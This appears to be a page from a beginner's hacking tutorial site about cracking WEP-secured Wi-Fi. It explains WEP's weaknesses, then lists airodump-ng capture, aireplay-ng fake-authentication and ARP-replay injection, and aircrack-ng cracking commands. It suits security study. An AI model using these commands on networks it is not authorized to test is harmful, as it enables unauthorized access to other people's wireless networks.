Hacking For Babies
  • Introduction
  • Ethical Hacking
  • Kali Linux
    • Why Kali ?
    • Virtual Machine
    • kali on Cloud
    • Bootable USB
    • Dual Boot Kali
    • Kali Nethunter
    • Most Used Linux Commands
    • Additional Information
  • Network Basics
    • What is the internet ?
    • Key Words
    • Network devices
    • LAN / WAN
    • VPN (Virtual Private Network)
    • Deep and Dark Web
    • Networking Commands
    • Additional Information
  • OSINT
    • Maltego
    • Google Advanced Search Operators
    • OSINT Username Finder
    • Social Media OSINT
    • Reverse Image Search
    • Protect yourself from OSINT
    • Additional Information
  • Digital Forensics
  • Phishing Attacks
    • Temporary Numbers
    • GitHub Projects/Tools
    • Kali Pre-Installed Tools
    • Emails Tricks
    • How to secure yourself from phishing attacks
    • Additional Information
  • Hardware Attacks
    • Marketplaces and Websites
    • Keylogger
    • USB Killer
    • Ethernet Hacking Tools
    • Flipper Zero
    • Bad USB
  • HID Attacks
    • Classic Bad USB
    • Wireless Bad USB
    • Keystroke Injection Cable
    • Other Tools Using the Some Concept
    • Simple Ducky Script
    • Reverse Shell Ducky Script
    • Solution for Bad USB
  • Cryptography
    • What is Cryptography ?
    • Simple Cryptography Algorithms
    • Hash Algorithms
    • Symmetric / Asymmetric cryptography
    • RSA Cryptosystem
    • Quantum Computers VS Cryptography
    • Steganography: Hiding Data in music and photos
    • Additional Information
  • Password Attacks
    • Dictionary Attacks
    • Brute Force Attacks
    • Hashcat
    • Hydra
    • Other Password Attacks Tools
    • Protect your Self against Password Attacks
  • Wireless Attacks
    • RFID / NFC Attacks
    • Bluetooth Attacks
    • MouseJack Attacks
    • IR Replay Attacks
    • RF Attacks
    • Wifi Attacks
  • WIFI Attacks
    • Wireless Adapters
    • Basic WIFI Manipulation
    • Deauthentication Attack
    • WIFI Cracking
    • MITM Attacks
    • Prebuild WIFI Pentesting Tools
    • WIFI Attack Solution
    • Additional Information
  • WIFI Cracking
    • WEP Cracking
    • WPS Attack
    • WPA Handshake Capture
    • PMKID Hash Capture
    • Hashcat Cracking
    • Wifite
    • Airgeddon
    • Fern WIFI Cracker
    • Protecting your Wi-Fi network from cracking
  • Coming Soon
Powered by GitBook
On this page
  • What is WEP ?
  • How To crack the WIFI?
  • Other YouTube Tutorials
  1. WIFI Cracking

WEP Cracking

What is WEP ?

WEP stands for Wired Equivalent Privacy. It is an older wireless network security protocol that was introduced as part of the IEEE 802.11 standard to provide data confidentiality for wireless networks. WEP was designed to provide security similar to that of a wired network, hence the name "Wired Equivalent Privacy."

WEP operates by encrypting data transmitted over a wireless network using a shared key. The encryption is based on the RC4 encryption algorithm. However, WEP has significant security vulnerabilities that have been discovered over the years, making it highly insecure and susceptible to attacks.

One of the major weaknesses of WEP is its use of a static encryption key, which makes it vulnerable to key cracking attacks. Additionally, WEP's implementation flaws and weaknesses in its encryption algorithm make it relatively easy for attackers to exploit and gain unauthorized access to a wireless network.

Due to its inherent security flaws, WEP is no longer considered a secure option for wireless network security. It has been largely replaced by more robust and secure protocols such as WPA (Wi-Fi Protected Access) and WPA2, which provide stronger encryption and better security features.

How To crack the WIFI?

  1. we need first to capture the traffic

airodump-ng –bssid [ap mac addr] –channel [ap channel] –write wpe_crack

If the network is not busy we can force the AP to generate new packets with fakeauth attack

aireplay-ng --fakeauth 0 -a [ap mac addr] -h [wifi interf mac addr] [interface]
  1. Then force the AP to generate new packets

aireplay-ng --arpreplay -b [ap mac addr] -h [wifi inter mac addr] [interface]
  1. Then we can crack the password with

aircrack-ng wpe_crack-01.cap

Other YouTube Tutorials

You can check those YouTube Videos/Tutorials about WEP Cracking:

PreviousWIFI CrackingNextWPS Attack

Last updated 1 year ago

created by

created by

created by

This YouTube Video
Null Byte
This YouTube Video
ayman soory
This YouTube Video
Cyber Security Ranger